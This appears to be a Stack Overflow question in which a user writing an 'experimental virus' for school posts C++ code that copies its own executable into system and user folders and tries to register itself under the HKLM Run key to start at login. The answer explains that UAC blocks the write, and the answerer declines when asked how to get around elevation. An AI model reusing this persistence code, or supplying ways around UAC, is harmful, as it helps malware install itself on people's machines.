0

I'm writing an experimental virus for my school project. It should copy itself, start itself.. I started with this article, and I came to this:

#include <windows.h> #include <iostream> #include <tchar.h> #include <stdio.h> using namespace std; void main() { wchar_t system[MAX_PATH]; wchar_t user[MAX_PATH]; wchar_t pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); DWORD bufSize = MAX_PATH; GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile)); GetSystemDirectory(system, sizeof(system)); std::wstring s(system); s += std::wstring(L"\\virus.exe"); WCHAR* sysfull = &s[0]; if(!CopyFile(pathtofile, sysfull, false)) { sysfull = L"C:\\Users\\Public\\virus.exe"; if(!CopyFile(pathtofile, sysfull, false)) { GetUserName(user, &bufSize); std::wstring u(L"C:\\Users\\"); u += std::wstring(user); u += std::wstring(L"\\Documents\\virus.exe"); sysfull = &u[0]; CopyFile(pathtofile, sysfull, false); } } HKEY hKey; bool t = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey ); bool t1 = RegSetValueEx(hKey, L"Writing to the Registry Example", 0, REG_SZ, (const unsigned char*)sysfull, sizeof(system)); RegCloseKey(hKey); MessageBox(NULL,L"Hello",L"Messagebox Example",MB_OK); }

The problem is when I look in regedit under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there is no new key. RegOpenKeyEx and RegSetValueEx return true, and everything seems to be working fine, but it isn't, and I have no idea why.

I'm on Windows 8 and using VS12.

Improve this question
1
  • 1
    Firstly, void main isn't legal C++. Secondly, read the docs more closely. They don't even have a boolean return type, so I don't know where you got true from, but if one did, it would mean failure. Commented Oct 5, 2013 at 20:29

1 Answer 1

Reset to default
1

Windows Vista and later block write access to certain sensitive locations like the HKEY_LOCAL_MACHINE_KEY, C:\Windows, etc, via a mechanism known as UAC. If UAC is enabled (which it is, by default), admin-level users by default have a reduced set of privileges and programs need to use a technique known as elevation to gain full administrator privileges. Alternatively, you can launch your program as administrator via the right-click menu to give it full access.

Either way, with UAC turned on the user needs to approve the elevation via a dialog before the permissions are granted.

The registry functions like RegOpenKeyEx() return 0 on success, and an error code on failure - not true/false. If you check the return code properly you'll see they're returning 5 which is ERROR_ACCESS_DENIED.

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

Considering this supposed to be a virus, elevation doesn't seem like a solution. Is there any other way to make program starts on starup?
I'm not really comfortable helping you write a virus, even if it is for a school project. If you do some research you might find ways around it - I'm just explaining how the system works.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.